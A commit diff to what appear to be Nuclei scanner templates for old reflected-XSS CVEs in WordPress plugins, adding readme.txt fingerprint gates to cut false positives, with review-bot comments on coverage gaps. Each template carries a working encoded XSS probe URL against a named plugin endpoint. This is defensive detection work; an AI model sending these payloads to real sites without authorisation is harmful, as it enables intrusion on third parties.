Wordpress FP Fix
parent
2ede6795a6
commit
c68dd7249c
|
@ -30,7 +30,20 @@ info:
|
||||||
product: sniplets_plugin
|
product: sniplets_plugin
|
||||||
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
|
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Code Snippets'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
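Review bot: The added `flow: http(1) && http(2)` makes the reflected-XSS request depend on `readme.txt` being served, so an install where that file was deleted or is blocked by the web server is never tested and reports clean even if `warning.php` is still reachable. The internal matcher also checks only the phrase `'Code Snippets'` with no status condition, so any response body that happens to contain it opens the gate. Consider pairing the word matcher with a `status: 200` matcher, and add a comment above the flow line such as `# gated on readme.txt; hosts that hide or remove it are skipped` so the coverage trade-off is visible to whoever triages results. The same gate is added to every other template in this commit that gains `flow: http(1) && http(2)`.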
@ -29,7 +29,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
|
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
|
||||||
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
|
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Grand Flagallery'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/adminimize/"
|
google-query: inurl:"/wp-content/plugins/adminimize/"
|
||||||
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
|
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Adminimize ==='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/skysa-official/"
|
google-query: inurl:"/wp-content/plugins/skysa-official/"
|
||||||
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
|
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Skysa App'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
|
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
|
||||||
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
|
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'ClickDesk Live Support - Live Chat'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -27,7 +27,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
|
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
|
||||||
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
|
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Featurific For Wordpress'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
|
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,timely
|
tags: cve,cve2012,wordpress,xss,wp-plugin,timely
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'All-in-One Event Calendar'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
product: wp-facethumb
|
product: wp-facethumb
|
||||||
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
|
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'WP-FaceThumb ==='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -26,7 +26,20 @@ info:
|
||||||
product: mf_gig_calendar
|
product: mf_gig_calendar
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
|
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'MF Gig Calendar ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -30,7 +30,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
|
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
|
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- '2 Click Social Media Buttons'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
|
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Download Monitor ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
product: wordpress_integrator
|
product: wordpress_integrator
|
||||||
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
|
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Wordpress Integrator'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
||||||
|
|
|
@ -27,7 +27,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/uploader"
|
google-query: inurl:"/wp-content/plugins/uploader"
|
||||||
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
|
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Uploader'
|
||||||
|
- "Tags:"
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,17 +29,32 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
|
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
|
||||||
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
|
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'traffic analy'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<script>alert(1)</script>"
|
- "<script>alert(document.domain)</script>"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
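Review bot: The gate words `'traffic analy'` are lowercase and the matcher has no `case-insensitive: true`, although the infusionsoft and sourceafrica templates in this commit set that option on their fingerprints. Word matchers compare case-sensitively unless told otherwise, so if the readme title is capitalised the gate never opens and the payload request is skipped on every target; the same applies to `'anti plagiarism'` in the anti-plagiarism template. Adding `case-insensitive: true` after `condition: and` removes the dependency on the readme's exact casing. The `matchers` list of the second request continues past the end of this hunk.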
@ -30,7 +30,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
|
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
|
||||||
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
|
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Category Grid View Gallery ='
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -29,7 +29,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/duplicator"
|
google-query: inurl:"/wp-content/plugins/duplicator"
|
||||||
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
|
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Duplicator - WordPress Migration'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
|
@ -28,7 +28,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
|
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
|
||||||
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
|
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'ActiveHelper LiveHelp Live Chat'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||||
|
|
|
@ -30,7 +30,23 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
|
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
|
||||||
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
|
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Infusionsoft'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
case-insensitive: true
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||||
|
|
|
@ -28,7 +28,22 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
|
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/movies/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Movies ='
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||||
|
|
|
@ -29,7 +29,22 @@ info:
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
|
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Ultimate Weather'
|
||||||
|
- 'Tags:'
|
||||||
|
condition: and
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
|
@ -30,7 +30,20 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
|
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
|
||||||
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
|
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
internal: true
|
||||||
|
words:
|
||||||
|
- 'Video Gallery WordPress DZS'
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
||||||
|
|
|
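Review bot: The fingerprint request fetches `/wp-content/plugins/dzs-videogallery/readme` with no `.txt` extension, while every other template in this commit requests `readme.txt`. If the plugin actually ships `readme.txt`, request 1 never matches `'Video Gallery WordPress DZS'` and the `flow` gate suppresses the XSS check everywhere, which turns the template into a silent false negative. Confirm the path against a real install; if the extensionless name is intentional, say so in a comment, e.g. `# this plugin ships "readme" without an extension`.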
@ -30,7 +30,7 @@ info:
|
||||||
vendor: ab_google_map_travel_project
|
vendor: ab_google_map_travel_project
|
||||||
product: ab_google_map_travel
|
product: ab_google_map_travel
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project
|
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
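Review bot: The second of the two printed `tags` lines swaps `packetstorm` for `authenticated` instead of appending it, so scans filtered on the `packetstorm` tag would no longer select this template. If the template's references still point at Packet Storm (not visible in this hunk), keep both: `tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,authenticated,ab_google_map_travel_project`.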
@ -31,7 +31,22 @@ info:
|
||||||
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
|
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
|
||||||
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
|
